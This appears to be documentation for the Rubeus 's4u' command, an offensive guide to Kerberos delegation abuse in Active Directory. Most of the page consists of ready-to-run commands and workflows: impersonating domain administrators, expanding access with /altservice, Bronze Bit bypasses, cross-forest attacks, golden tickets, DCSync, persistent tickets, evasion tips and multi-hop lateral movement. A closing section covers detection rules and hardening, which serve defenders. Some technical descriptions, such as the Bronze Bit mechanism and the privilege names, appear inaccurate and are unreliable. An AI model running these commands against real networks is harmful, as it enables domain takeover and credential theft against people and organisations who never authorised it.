s4u

S4U delegation abuse enables impersonation of any domain user, including administrators, providing critical privilege escalation and lateral movement capabilities.

User Impersonation

Impersonate any domain user without their credentials

Service Access

Gain access to backend services via delegation

Privilege Escalation

Escalate from service account to domain admin

Cross-Domain

Exploit delegation across domain boundaries

Overview

Perform S4U (Service for User) constrained delegation abuse to impersonate users and gain access to services. This technique exploits Kerberos constrained delegation configurations to escalate privileges and move laterally through Active Directory environments.

Basic Syntax
Authentication Methods
Target Configuration

# Core S4U delegation attack
Rubeus.exe s4u [authentication] /impersonateuser:USER /msdsspn:SERVICE [options]

# Common attack pattern
Rubeus.exe s4u /user:svcaccount /rc4:hash /impersonateuser:administrator /msdsspn:cifs/target.domain.com /ptt

# Using existing TGT
/ticket:BASE64_TGT
/ticket:FILE.KIRBI

# Hash authentication
/user:SERVICE_ACCOUNT /rc4:NTLM_HASH
/user:SERVICE_ACCOUNT /aes256:AES_HASH /domain:DOMAIN

# Certificate authentication
/user:SERVICE_ACCOUNT /certificate:CERT.PFX /password:CERT_PASS

# Local domain targeting
/impersonateuser:target_user /msdsspn:service/server.domain.com

# Cross-domain targeting
/impersonateuser:admin /msdsspn:cifs/server.remote.com /targetdomain:remote.com /targetdc:dc.remote.com

# Alternative service exploitation
/msdsspn:http/web.domain.com /altservice:cifs,host,ldap

Core Parameters
Authentication Options
Advanced Options

Hide Authentication & Impersonation

user

string

Show Service Account Details

Service account name configured for delegationRequirements:

Account must have delegation rights
Must be configured for constrained delegation
Requires corresponding hash or TGT

Discovery Commands:

# Find delegation-enabled accounts
Get-ADUser -Filter {TrustedToAuthForDelegation -eq $true}

impersonateuser

string

required

Show Target User Selection

User to impersonate via delegationHigh-Value Targets:

administrator - Built-in admin account
domain admin - Domain administrative users
service accounts - High-privilege service accounts
computer accounts - Machine account impersonation

Notes:

Can impersonate ANY domain user
No password/hash required for target
Includes protected users (with some limitations)

msdsspn

string

required

Show Delegation Target Service

Service Principal Name for delegation targetFormat: service/hostname.domain.com[:port]Common Patterns:

cifs/fileserver.corp.local - File services
http/web.corp.local - Web applications
MSSQLSvc/sql.corp.local:1433 - Database
ldap/dc.corp.local - Directory services
host/server.corp.local - Administrative access

Discovery: Check service account’s delegation configuration

Show Hash-Based Authentication

rc4

string

Show NTLM Hash Authentication

NTLM hash for service account authenticationFormat: 32-character hexadecimal string Example: 32ed87bdb5fdc5e9cba88547376818d4Acquisition Methods:

DCSync attacks
LSA dumping
Hash cracking
Pass-the-hash captures

aes256

string

Show AES256 Hash Authentication

AES256 Kerberos key for service accountAdvantages:

More secure than RC4
Better OPSEC profile
Modern encryption standard

Acquisition: DCSync or advanced hash extraction

ticket

string

Show TGT-Based Authentication

Existing TGT for service accountFormats:

Base64-encoded ticket data
.kirbi file path

Sources:

Extracted via dump command
Golden ticket attacks
Legitimate authentication

Show Service Manipulation

altservice

string

Show Alternative Service Targeting

Alternative service to target using delegationService Equivalence Classes:

cifs,host - File and administrative access
http,https - Web service access
ldap,gc - Directory service access
rpcss,dcom - RPC services

Multi-Service Targeting:

/altservice:cifs,host,http,ldap

Use Cases:

Expand delegation scope
Access related services
Maximize attack surface

bronzebit

boolean

nopac

boolean

self

boolean

Show Cross-Domain Configuration

targetdomain

string

Show Cross-Domain Targeting

Target domain for cross-domain delegationRequirements:

Domain trust relationship
Cross-domain delegation configuration
Network connectivity to target domain

Trust Types:

Parent-child trusts
Forest trusts
External trusts (limited)

targetdc

string

Show Target Domain Controller

Specific domain controller in target domainSelection Criteria:

Network accessibility
Service availability
Load balancing considerations
OPSEC considerations

Show Output & Injection

ptt

boolean

outfile

string

createnetonly

string

Basic Delegation
Service Escalation
Cross-Domain Attacks
Advanced Techniques
Integration Workflows

# Service account to file server
Rubeus.exe s4u /user:svc_web /rc4:32ed87bdb5fdc5e9cba88547376818d4 /impersonateuser:administrator /msdsspn:cifs/fileserver.corp.local /ptt

# Service account to database
Rubeus.exe s4u /user:svc_app /aes256:b982a9a15bc34fd3ccfb18041095b5394a7c6a0a9f2e02c3d6b8d86a59a73f02 /impersonateuser:administrator /msdsspn:MSSQLSvc/sql01.corp.local:1433 /ptt

# Service account to domain controller
Rubeus.exe s4u /user:svc_backup /rc4:hash /impersonateuser:administrator /msdsspn:ldap/dc01.corp.local /ptt

# HTTP delegation to file access
Rubeus.exe s4u /user:svc_web /rc4:hash /impersonateuser:administrator /msdsspn:http/web01.corp.local /altservice:cifs /ptt

# Database delegation to administrative access
Rubeus.exe s4u /user:svc_sql /aes256:key /impersonateuser:administrator /msdsspn:MSSQLSvc/sql.corp.local:1433 /altservice:host /ptt

# Multi-service targeting
Rubeus.exe s4u /user:svc_app /rc4:hash /impersonateuser:administrator /msdsspn:host/server.corp.local /altservice:cifs,http,ldap,rpcss /ptt

# Child to parent domain
Rubeus.exe s4u /user:svc_web /rc4:hash /domain:child.corp.local /impersonateuser:administrator /msdsspn:cifs/fileserver.corp.local /targetdomain:corp.local /targetdc:dc01.corp.local /ptt

# Parent to child domain
Rubeus.exe s4u /user:svc_app /aes256:key /domain:corp.local /impersonateuser:administrator /msdsspn:http/web.child.corp.local /targetdomain:child.corp.local /ptt

# Standard Bronze Bit
Rubeus.exe s4u /user:svc_web /rc4:hash /impersonateuser:administrator /msdsspn:http/web.corp.local /bronzebit /nopac /ptt

# Bronze Bit with service alternation
Rubeus.exe s4u /user:svc_app /aes256:key /impersonateuser:administrator /msdsspn:host/server.corp.local /altservice:cifs /bronzebit /nopac /ptt

# Cross-domain Bronze Bit
Rubeus.exe s4u /user:svc_db /rc4:hash /domain:child.corp.local /impersonateuser:administrator /msdsspn:MSSQLSvc/db.parent.corp:1433 /targetdomain:parent.corp /bronzebit /nopac

# 1. Find delegation-enabled accounts
# PowerShell: Get-ADUser -Filter {TrustedToAuthForDelegation -eq $true}

# 2. Extract service account credentials
Rubeus.exe asktgt /user:svc_found /rc4:discovered_hash /outfile:svc.kirbi

# 3. Perform delegation attack
Rubeus.exe s4u /ticket:svc.kirbi /impersonateuser:administrator /msdsspn:discovered_spn /ptt

# 4. Verify access
Rubeus.exe klist

S4U Protocol Flow

S4U2Self Phase
S4U2Proxy Phase
Service Access

Request

Service → KDC

Service requests TGS for itself
On behalf of target user
Results in forwardable ticket
Uses service account credentials

Response

KDC → Service

Returns forwardable TGS
Ticket marked for delegation
Contains user’s identity
Ready for S4U2Proxy

Technical Details:

Service authenticates with its own credentials
Requests ticket “for” another user
No user credentials required
Results in forwardable service ticket

Delegation Types

Unconstrained Delegation
Constrained Delegation
Resource-Based (RBCD)

Unconstrained delegation provides the highest attack surface and risk

Characteristics:

Service can delegate to ANY service
Stores user’s TGT for reuse
No restrictions on delegation targets
Legacy configuration pattern

Attack Implications:

Complete user impersonation capability
Access to any domain service
TGT extraction opportunities
High privilege escalation potential

Detection: userAccountControl contains TRUSTED_FOR_DELEGATION (524288)

Traditional KCD

Configuration:

Service account property
msDS-AllowedToDelegateTo attribute
Explicit SPN list
“Trust this computer for delegation” setting

Limitations:

Only to configured services
Requires service account privileges
Administrator-controlled configuration

Protocol Transition

Capabilities:

Accept non-Kerberos authentication
Transition to Kerberos delegation
S4U2Self without prior authentication
Enhanced impersonation scenarios

Attack Surface:

Broader impersonation capabilities
Protocol downgrade opportunities
Bypass authentication requirements

Resource-Based Constrained Delegation reverses the control model

Key Differences:

Backend service controls delegation
msDS-AllowedToActOnBehalfOfOtherIdentity attribute
Computer account creation abuse
More flexible configuration

Attack Vectors:

Create computer accounts
Modify resource delegation settings
Exploit weak ACL permissions
Self-delegation scenarios

Discovery Commands:

# Find RBCD configurations
Get-ADComputer -Filter * -Properties msDS-AllowedToActOnBehalfOfOtherIdentity

Configuration Requirements

Hide Service Account Prerequisites

Required Privileges:

SeAssignPrimaryTokenPrivilege (Act as part of operating system)
SeTcbPrivilege (Act as part of operating system)
Service account must be configured for delegation

Delegation Configuration:

Trust for delegation enabled
Specific services configured in delegation list
Proper SPN registration
Domain functional level support

Security Boundaries:

Protected Users group (limited)
Account cannot be delegated flag
Cross-forest restrictions
Time-based limitations

Prerequisites
Discovery Commands
Assessment Matrix

Service Account Compromise

Credential Requirements

Required Access:

Service account password hash (RC4/AES)
Valid TGT for service account
Certificate-based authentication
Kerberos ticket extraction

Configuration Validation

Verification Steps:

Account has delegation configuration
Target services in delegation list
Proper privilege assignments
Domain controller accessibility

Credential Acquisition Methods:

Kerberoasting service account
DCSync for password hashes
Memory extraction (dump, lsass)
Golden ticket with service account

Delegation Discovery

Account Enumeration:

# Find all delegation-enabled accounts
Get-ADUser -Filter {TrustedToAuthForDelegation -eq $true} -Properties servicePrincipalName,msDS-AllowedToDelegateTo

# Include computer accounts
Get-ADComputer -Filter {TrustedToAuthForDelegation -eq $true} -Properties servicePrincipalName,msDS-AllowedToDelegateTo

# Find unconstrained delegation
Get-ADUser -Filter {TrustedForDelegation -eq $true}

Service Validation:

Verify SPN registration
Check delegation target list
Validate service accessibility
Test network connectivity

Target Assessment

High-Value Targets:

Domain controllers (LDAP, GC)
File servers (CIFS)
Database servers (MSSQLSvc)
Web applications (HTTP/HTTPS)
Administrative services (HOST)

Privilege Analysis:

Administrative service access
Cross-domain delegation
Service account privileges
Delegation scope assessment

# Comprehensive delegation discovery
Get-ADUser -Filter {TrustedForDelegation -eq $true -or TrustedToAuthForDelegation -eq $true} -Properties TrustedForDelegation,TrustedToAuthForDelegation,servicePrincipalName,msDS-AllowedToDelegateTo | Format-Table Name,TrustedForDelegation,TrustedToAuthForDelegation,msDS-AllowedToDelegateTo

# Find computer accounts with delegation
Get-ADComputer -Filter {TrustedForDelegation -eq $true -or TrustedToAuthForDelegation -eq $true} -Properties TrustedForDelegation,TrustedToAuthForDelegation,servicePrincipalName,msDS-AllowedToDelegateTo

# Resource-based constrained delegation
Get-ADComputer -Filter * -Properties msDS-AllowedToActOnBehalfOfOtherIdentity | Where {$_.msDS-AllowedToActOnBehalfOfOtherIdentity -ne $null}

Hide Delegation Risk Assessment

Account Type	Delegation Type	Risk Level	Attack Complexity	Impact
Service Account	Unconstrained	Critical	Low	Domain Admin
Service Account	Constrained	High	Medium	Service Access
Computer Account	RBCD	High	Medium	Local Admin
User Account	Protocol Transition	Medium	High	User Privileges

Target Prioritization:

Critical Services: Domain controllers, Exchange, SQL
Administrative Services: File servers, management tools
Application Services: Web apps, databases
Infrastructure Services: DNS, DHCP, monitoring

Attack Feasibility:

Service account credential difficulty
Network accessibility to targets
Delegation configuration scope
Defensive tool presence

Service Categories
Service Equivalence
Target Selection

Infrastructure Services

Domain Controllers:

ldap/dc.corp.local - Directory services
gc/dc.corp.local - Global catalog
dns/dc.corp.local - DNS services
host/dc.corp.local - Administrative access

Critical Impact: Domain admin equivalent access

File Services

File Servers:

cifs/fileserver.corp.local - SMB shares
nfs/fileserver.corp.local - NFS shares
host/fileserver.corp.local - Admin access

Access Scope: File system, administrative shells

Database Services

SQL Servers:

MSSQLSvc/sql.corp.local:1433 - SQL Server
oracle/db.corp.local:1521 - Oracle
mysql/db.corp.local:3306 - MySQL

Privilege Escalation: Database admin, OS access

Web Services

Application Servers:

http/web.corp.local - Web applications
https/web.corp.local - Secure web
ws/web.corp.local - Web services

Attack Surface: Application admin, IIS access

Service Class Relationships

Hide Administrative Service Classes

HOST Service Class:

Accepts multiple service types
Provides administrative access
Works for many Windows services
Often configured for delegation

Equivalent Services:

host/server = Administrative access
cifs/server = File system access
rpcss/server = RPC service access
wsman/server = PowerShell remoting

Attack Strategy:

# Delegation to host service
/msdsspn:host/server.corp.local

# Automatic access to equivalent services:
# - CIFS file access
# - RPC administrative access
# - PowerShell remoting
# - Service management

Cross-Service Exploitation

Web to File

Scenario: HTTP delegation to file access

/msdsspn:http/web.corp.local /altservice:cifs

Result: Web app access → File system access

Database to Admin

Scenario: SQL delegation to administrative access

/msdsspn:MSSQLSvc/sql.corp.local:1433 /altservice:host

Result: Database access → Full administrative control

Multi-Service Targeting

Maximize Attack Surface:

# Target multiple related services
/msdsspn:http/server.corp.local /altservice:cifs,host,ldap,rpcss

# Database to everything
/msdsspn:MSSQLSvc/sql.corp.local:1433 /altservice:host,cifs,http,rpcss

# Administrative delegation expansion
/msdsspn:host/server.corp.local /altservice:cifs,http,ldap,dns,rpcss

Service Priority:

host - Maximum administrative access
cifs - File system access
ldap - Directory service access
rpcss - RPC service management
http - Web application access

High-Value Targets

Domain Controllers:

ldap/dc01.corp.local - Primary DC
ldap/dc02.corp.local - Secondary DC
gc/dc01.corp.local - Global catalog

Attack Value: Domain admin equivalent accessFile Servers:

cifs/shares.corp.local - Primary file server
cifs/backup.corp.local - Backup server
cifs/archive.corp.local - Archive server

Attack Value: Data access, credential harvesting

Infrastructure Servers

Management Servers:

host/sccm.corp.local - SCCM server
host/wsus.corp.local - Update server
host/monitoring.corp.local - Monitoring

Database Servers:

MSSQLSvc/sql01.corp.local:1433 - Production SQL
MSSQLSvc/reporting.corp.local:1433 - Reporting
oracle/erp.corp.local:1521 - ERP system

Web Applications:

http/intranet.corp.local - Corporate intranet
http/portal.corp.local - Employee portal
https/vpn.corp.local - VPN gateway

Targeting Strategy

Reconnaissance:

Enumerate delegation configurations
Map service relationships
Identify high-privilege targets
Assess network accessibility

Prioritization:

Domain controllers (critical)
Administrative servers (high)
Database servers (high)
File servers (medium)
Application servers (medium)

Exploitation Sequence:

Start with configured delegation targets
Use /altservice for expansion
Chain through multiple services
Document successful paths

Bronze Bit Attack
Cross-Domain Exploitation
Advanced Persistence

Bronze Bit attacks exploit PAC validation weaknesses to bypass delegation restrictions

Technique Overview

Core Concept:

Exploits missing PAC validation in S4U2Proxy
Allows delegation without proper configuration
Bypasses msDS-AllowedToDelegateTo restrictions
Works against services not in delegation list

Technical Mechanism:

Service requests S4U2Self ticket
Modifies or removes PAC validation
Uses ticket for S4U2Proxy to any service
Target service accepts without validation

Implementation Requirements

Prerequisites

Required Access:

Compromised service account
Service account hash or TGT
Network access to target
Target service existence

Limitations

Environmental Factors:

Some services validate PAC
Modern Windows may block
Patch level dependent
Domain functional level

Attack Execution:

# Standard Bronze Bit
Rubeus.exe s4u /user:svc_account /rc4:hash /impersonateuser:administrator /msdsspn:cifs/target.corp.local /bronzebit /nopac /ptt

# With service alternation
Rubeus.exe s4u /user:svc_web /aes256:key /impersonateuser:administrator /msdsspn:http/web.corp.local /altservice:cifs,host /bronzebit /nopac /ptt

Target Expansion

Unrestricted Targeting:

Attack services not in delegation list
Bypass delegation configuration entirely
Access any reachable service
Combine with service substitution

Strategic Applications:

# Target domain controllers (not in delegation list)
/msdsspn:ldap/dc01.corp.local /bronzebit /nopac

# Access administrative services
/msdsspn:host/critical.corp.local /bronzebit /nopac

# Multi-service bronze bit
/msdsspn:http/any.corp.local /altservice:cifs,host,ldap /bronzebit /nopac

Trust Relationship Analysis

Parent-Child Trusts

Characteristics:

Bidirectional trusts
Automatic trust creation
Cross-domain delegation support
Forest-wide implications

External Trusts

Limitations:

Unidirectional options
Limited delegation scope
Authentication boundaries
Selective authentication

Forest Trusts

Capabilities:

Cross-forest delegation
Transitive relationships
Global catalog access
Enterprise-wide scope

Trust Discovery:

# Enumerate domain trusts
Get-ADTrust -Filter *
nltest /domain_trusts

# Forest trust information
Get-ADForest | Select-Object Domains,ForestMode,GlobalCatalogs

Cross-Domain Attack Execution

Parent-Child Scenarios:

# Child to parent delegation
Rubeus.exe s4u /user:svc_child /rc4:hash /domain:child.corp.local /impersonateuser:administrator /msdsspn:cifs/parent-server.corp.local /targetdomain:corp.local /targetdc:dc01.corp.local /ptt

# Parent to child delegation
Rubeus.exe s4u /user:svc_parent /aes256:key /domain:corp.local /impersonateuser:administrator /msdsspn:ldap/child-dc.child.corp.local /targetdomain:child.corp.local /ptt

Forest Trust Exploitation:

# Cross-forest delegation
Rubeus.exe s4u /user:svc_internal /rc4:hash /domain:internal.corp /impersonateuser:administrator /msdsspn:cifs/external-server.partner.local /targetdomain:partner.local /targetdc:dc.partner.local

Advanced Cross-Domain Techniques

Golden Ticket Integration:

# Create cross-domain golden ticket
Rubeus.exe golden /user:administrator /domain:child.corp.local /sid:S-1-5-21-child-domain /krbtgt:hash /sids:S-1-5-21-parent-domain-519

# Use for cross-domain delegation
Rubeus.exe s4u /ticket:golden.kirbi /impersonateuser:administrator /msdsspn:cifs/parent-server.corp.local /targetdomain:corp.local

Service Account Targeting:

Target service accounts in trusted domains
Exploit cross-domain service relationships
Leverage forest-wide administrative groups
Chain delegation across multiple domains

Delegation-Based Persistence

Renewable Ticket Strategy:

# Create long-lived delegated tickets
Rubeus.exe s4u /user:svc_persist /rc4:hash /impersonateuser:administrator /msdsspn:cifs/critical.corp.local /outfile:persist.kirbi

# Renew before expiration
Rubeus.exe renew /ticket:persist.kirbi /outfile:renewed.kirbi

# Maintain access
Rubeus.exe ptt /ticket:renewed.kirbi

Service Account Rotation:

Identify multiple delegation-enabled accounts
Rotate between different service accounts
Distribute delegation activities
Maintain backup access methods

Stealth Considerations

Operational Security:

Use AES encryption when possible
Avoid bulk delegation activities
Blend with normal service patterns
Implement delays between operations

Detection Evasion:

# OPSEC-conscious delegation
Rubeus.exe s4u /user:svc_web /aes256:key /impersonateuser:normaluser /msdsspn:http/web.corp.local /opsec /ptt

# Targeted single-service access
Rubeus.exe s4u /user:svc_app /rc4:hash /impersonateuser:serviceaccount /msdsspn:MSSQLSvc/db.corp.local:1433 /ptt

Delegation Chaining

Multi-Hop Scenarios:

Initial service account compromise
Delegate to intermediate service
Extract credentials from intermediate
Chain to final high-value target
Establish persistent access

Attack Chain Example:

# Step 1: Web service to database
Rubeus.exe s4u /user:svc_web /rc4:hash1 /impersonateuser:administrator /msdsspn:MSSQLSvc/db.corp.local:1433 /ptt

# Step 2: Access database, extract service account
# [Database access and credential extraction]

# Step 3: Database service to domain controller
Rubeus.exe s4u /user:svc_db /rc4:hash2 /impersonateuser:administrator /msdsspn:ldap/dc01.corp.local /ptt

Domain Escalation
Lateral Movement
Specialized Scenarios

Service Account Discovery

Target Identification:

# Find high-privilege delegation targets
Get-ADUser -Filter {TrustedToAuthForDelegation -eq $true} -Properties msDS-AllowedToDelegateTo | Where {$_.msDS-AllowedToDelegateTo -like "*ldap*" -or $_.msDS-AllowedToDelegateTo -like "*gc*"}

# Identify domain controller delegation
Get-ADUser -Filter {TrustedToAuthForDelegation -eq $true} -Properties msDS-AllowedToDelegateTo | Where {$_.msDS-AllowedToDelegateTo -match "ldap/.*\.corp\.local"}

Service Account Compromise:

Kerberoast delegation-enabled accounts
Target service accounts with DC access
Extract credentials via memory dumps
Golden ticket for service accounts

Domain Controller Access

LDAP Service Targeting

# LDAP delegation to DC
Rubeus.exe s4u /user:svc_exchange /rc4:hash /impersonateuser:administrator /msdsspn:ldap/dc01.corp.local /ptt

# Global catalog access
Rubeus.exe s4u /user:svc_app /aes256:key /impersonateuser:administrator /msdsspn:gc/dc01.corp.local /ptt

Result: Directory service administrative access

HOST Service Escalation

# Full administrative access
Rubeus.exe s4u /user:svc_backup /rc4:hash /impersonateuser:administrator /msdsspn:host/dc01.corp.local /ptt

# Alternative service expansion
Rubeus.exe s4u /user:svc_web /aes256:key /impersonateuser:administrator /msdsspn:http/dc01.corp.local /altservice:host,cifs,ldap /ptt

Result: Domain admin equivalent access

Verification & Exploitation

Access Confirmation:

# Verify delegation success
Rubeus.exe klist

# Test domain admin access
dir \\dc01.corp.local\c$
net user /domain

# DCSync capability
mimikatz "lsadump::dcsync /user:krbtgt"

Persistence Establishment:

Create additional delegation accounts
Extract KRBTGT hash for golden tickets
Add to administrative groups
Deploy backdoor accounts

Service Tier Escalation

Web Tier to Database:

# Web service delegation to database
Rubeus.exe s4u /user:svc_web /rc4:hash /impersonateuser:administrator /msdsspn:MSSQLSvc/sql01.corp.local:1433 /ptt

# Alternative database targeting
Rubeus.exe s4u /user:svc_app /aes256:key /impersonateuser:administrator /msdsspn:oracle/erp.corp.local:1521 /ptt

Database to File Services:

# Database service to file server
Rubeus.exe s4u /user:svc_sql /rc4:hash /impersonateuser:administrator /msdsspn:cifs/shares.corp.local /ptt

# Multi-target file access
Rubeus.exe s4u /user:svc_db /aes256:key /impersonateuser:administrator /msdsspn:host/fileserver.corp.local /altservice:cifs /ptt

Infrastructure Hopping

Management Server Access:

# SCCM server delegation
Rubeus.exe s4u /user:svc_app /rc4:hash /impersonateuser:administrator /msdsspn:host/sccm.corp.local /ptt

# Monitoring system access
Rubeus.exe s4u /user:svc_web /aes256:key /impersonateuser:administrator /msdsspn:http/monitoring.corp.local /altservice:host /ptt

# Backup server targeting
Rubeus.exe s4u /user:svc_sql /rc4:hash /impersonateuser:administrator /msdsspn:cifs/backup.corp.local /ptt

Network Infrastructure:

DNS server delegation
DHCP server access
Network management tools
VPN gateway systems

Multi-Hop Chaining

Attack Chain Example:

Initial Access: Web service account
First Hop: Delegate to database server
Credential Extraction: Database service account
Second Hop: Database to file server
Lateral Expansion: File server to domain controller

Implementation:

# Hop 1: Web to Database
Rubeus.exe s4u /user:svc_web /rc4:hash1 /impersonateuser:administrator /msdsspn:MSSQLSvc/db.corp.local:1433 /ptt

# [Extract svc_db credentials from database]

# Hop 2: Database to File Server
Rubeus.exe s4u /user:svc_db /rc4:hash2 /impersonateuser:administrator /msdsspn:cifs/shares.corp.local /ptt

# [Extract additional credentials from file server]

# Hop 3: File Server to Domain Controller
Rubeus.exe s4u /user:svc_backup /rc4:hash3 /impersonateuser:administrator /msdsspn:ldap/dc01.corp.local /ptt

Exchange Server Delegation

High-Privilege Targeting:

# Exchange to domain controller
Rubeus.exe s4u /user:svc_exchange /rc4:hash /impersonateuser:administrator /msdsspn:ldap/dc01.corp.local /ptt

# Exchange administrative access
Rubeus.exe s4u /user:svc_app /aes256:key /impersonateuser:administrator /msdsspn:http/exchange.corp.local /altservice:host /ptt

Value Proposition:

Exchange often has broad delegation rights
Access to email data and credentials
Administrative access to mail infrastructure
Potential domain admin escalation path

SQL Server Exploitation

Database Administrative Access:

# SQL Server administrative delegation
Rubeus.exe s4u /user:svc_web /rc4:hash /impersonateuser:administrator /msdsspn:MSSQLSvc/sql.corp.local:1433 /ptt

# Multiple SQL server targeting
Rubeus.exe s4u /user:svc_app /aes256:key /impersonateuser:administrator /msdsspn:MSSQLSvc/reporting.corp.local:1433 /altservice:host /ptt

Post-Exploitation:

Database administrative access
Credential extraction from databases
OS-level access via xp_cmdshell
Linked server traversal

Application Server Targeting

SharePoint Delegation:

# SharePoint service delegation
Rubeus.exe s4u /user:svc_web /rc4:hash /impersonateuser:administrator /msdsspn:http/sharepoint.corp.local /altservice:host,cifs /ptt

ERP System Access:

# SAP/Oracle ERP delegation
Rubeus.exe s4u /user:svc_app /aes256:key /impersonateuser:administrator /msdsspn:oracle/erp.corp.local:1521 /altservice:host /ptt

Business Impact:

Access to business-critical applications
Financial and operational data
Administrative configuration access
Potential for business disruption

Detection Indicators
Monitoring Strategies
Mitigation Controls

S4U delegation attacks generate distinctive patterns that can be detected through comprehensive monitoring

Hide Event Log Analysis

Primary Event IDs:

4769 - Kerberos service ticket was requested
4770 - Kerberos service ticket was renewed
4771 - Kerberos pre-authentication failed
4768 - Kerberos authentication ticket (TGT) was requested

S4U-Specific Patterns:

Event 4769 Analysis:
- Service Name: Contains target service SPN
- Account Name: Service account performing delegation
- Client Address: Often ::1 (localhost) for S4U operations
- Ticket Options: 0x40810010 (forwardable, renewable)
- Ticket Encryption Type: May show downgrade to RC4

Anomaly Detection:

Service accounts requesting tickets for administrators
Rapid succession of S4U2Self → S4U2Proxy events
Cross-domain ticket requests
Service tickets for services not in delegation list

Show Behavioral Analysis

Service Account Anomalies:

Service accounts authenticating outside normal patterns
Requests for high-privilege user impersonation
Access to services outside typical workflow
Authentication from unexpected source IPs

Delegation Pattern Analysis:

Multiple delegation attempts in short timeframes
Failed delegation attempts followed by successful ones
Cross-domain delegation activities
Service substitution patterns (/altservice usage)

Network-Level Indicators:

Kerberos traffic from non-domain member systems
Unusual authentication timing patterns
Multiple service ticket requests to different services
Cross-network authentication attempts

Show Technical Signatures

API Usage Patterns:

LsaCallAuthenticationPackage with S4U structures
Multiple rapid Kerberos API calls
Non-standard authentication flows
Service ticket requests with modified PACs

Process Behavior:

Non-service processes performing delegation
Processes running with service account contexts
Memory access patterns consistent with credential extraction
Rubeus or similar tool execution artifacts

Event Log Configuration

Enable Advanced Auditing:

# Configure audit policies
auditpol /set /subcategory:"Kerberos Service Ticket Operations" /success:enable /failure:enable
auditpol /set /subcategory:"Kerberos Authentication Service" /success:enable /failure:enable

# PowerShell monitoring
auditpol /set /subcategory:"PowerShell" /success:enable /failure:enable

SIEM Integration:

Centralized log collection
Real-time event correlation
Baseline establishment
Anomaly detection algorithms

Detection Rules

Splunk Detection:

# S4U delegation detection
index=wineventlog EventCode=4769 Service_Name="*" Account_Name="svc_*" | where like(Account_Name, "%svc_%") AND like(Service_Name, "%ldap%" OR "%cifs%" OR "%host%") | stats count by Account_Name, Service_Name, Client_Address

# Multiple rapid delegation attempts
index=wineventlog EventCode=4769 | bucket _time span=1m | stats count by _time, Account_Name | where count > 10

Sigma Rules:

title: S4U Kerberos Delegation Abuse
detection:
  selection:
    EventID: 4769
    ServiceName:
      - 'ldap/*'
      - 'cifs/*'
      - 'host/*'
    AccountName: 'svc_*'
  condition: selection

Behavioral Monitoring

Service Account Baselines:

Normal authentication patterns
Typical service access requirements
Expected delegation relationships
Standard operational timeframes

Anomaly Detection:

Deviation from baseline behavior
Unusual authentication sources
Unexpected service access patterns
Off-hours delegation activities

Configuration Hardening

Delegation Minimization

Best Practices:

Remove unnecessary delegation configurations
Use resource-based constrained delegation (RBCD)
Implement least-privilege delegation
Regular delegation audits

Account Protection

Security Measures:

Enable “Account is sensitive and cannot be delegated”
Use Protected Users group
Implement strong service account passwords
Regular password rotation

Technical Controls:

# Disable delegation for sensitive accounts
Set-ADUser -Identity "administrator" -AccountNotDelegated $true

# Add to Protected Users group
Add-ADGroupMember -Identity "Protected Users" -Members "administrator"

# Audit delegation configurations
Get-ADUser -Filter {TrustedToAuthForDelegation -eq $true} -Properties msDS-AllowedToDelegateTo

Network Security

Segmentation:

Isolate service accounts by network segment
Restrict service-to-service communication
Implement micro-segmentation
Monitor cross-segment authentication

Access Controls:

Time-based access restrictions
Source IP validation
Service-specific access policies
Multi-factor authentication requirements

Detection & Response

Real-Time Monitoring:

# SIEM Alert Configuration
Alert: S4U Delegation Detected
Trigger: Multiple 4769 events from service account within 5 minutes
Action:
  - Disable service account
  - Alert security team
  - Initiate incident response
  - Capture network traffic

Incident Response:

Isolate affected service accounts
Reset service account passwords
Audit delegation configurations
Review authentication logs
Assess lateral movement potential
Implement additional monitoring

Proactive Measures:

Regular delegation audits
Service account inventory
Privilege escalation testing
Security awareness training

Ticket Requests

asktgs - Manual service ticket requests for delegation preparation

Ticket Analysis

describe - Deep analysis of delegated ticket structure and contents

Ticket Injection

ptt - Inject delegated service tickets into current or target sessions

Golden Tickets

golden - Create domain-wide tickets with delegation capabilities

Credential Extraction

dump - Extract service account tickets for delegation attacks

Session Management

createnetonly - Create isolated sessions for delegated ticket usage

Integration Workflows

Discovery Phase

Identify delegation opportunities:

# Find delegation-enabled accounts
# PowerShell: Get-ADUser -Filter {TrustedToAuthForDelegation -eq $true}

# Extract service account credentials
Rubeus.exe asktgt /user:discovered_svc /rc4:extracted_hash

Exploitation Phase

Execute delegation attack:

# Perform S4U delegation
Rubeus.exe s4u /user:svc_account /rc4:hash /impersonateuser:administrator /msdsspn:target_service /ptt

# Verify successful delegation
Rubeus.exe klist

Analysis & Expansion

Analyze and expand access:

# Analyze delegated ticket
Rubeus.exe describe /ticket:base64_ticket

# Expand to related services
Rubeus.exe s4u /ticket:current_tgt /impersonateuser:administrator /msdsspn:original_service /altservice:cifs,host,ldap /ptt

Persistence & Movement

Establish persistence and move laterally:

# Save high-value tickets
Rubeus.exe s4u /user:svc_account /rc4:hash /impersonateuser:administrator /msdsspn:ldap/dc.corp.local /outfile:dc_access.kirbi

# Create dedicated session
Rubeus.exe createnetonly /program:cmd.exe
Rubeus.exe ptt /ticket:dc_access.kirbi /luid:new_session_luid

Getting Started

Ticket Operations

Attack Techniques

Miscellaneous

User Impersonation

Service Access

Privilege Escalation

Cross-Domain

Overview

Request

Response

Delegation Request

Service Ticket

Traditional KCD

Protocol Transition

Credential Requirements

Configuration Validation

Infrastructure Services

File Services

Database Services

Web Services

Web to File

Database to Admin

Prerequisites

Limitations

Parent-Child Trusts

External Trusts

Forest Trusts

LDAP Service Targeting

HOST Service Escalation

Delegation Minimization

Account Protection

Ticket Requests

Ticket Analysis

Ticket Injection

Golden Tickets

Credential Extraction

Session Management

Integration Workflows

Getting Started

Ticket Operations

Attack Techniques

Miscellaneous

User Impersonation

Service Access

Privilege Escalation

Cross-Domain

​Overview

Request

Response

Delegation Request

Service Ticket

Traditional KCD

Protocol Transition

Credential Requirements

Configuration Validation

Infrastructure Services

File Services

Database Services

Web Services

Web to File

Database to Admin

Prerequisites

Limitations

Parent-Child Trusts

External Trusts

Forest Trusts

LDAP Service Targeting

HOST Service Escalation

Delegation Minimization

Account Protection

Ticket Requests

Ticket Analysis

Ticket Injection

Golden Tickets

Credential Extraction

Session Management

​Integration Workflows

Overview

Integration Workflows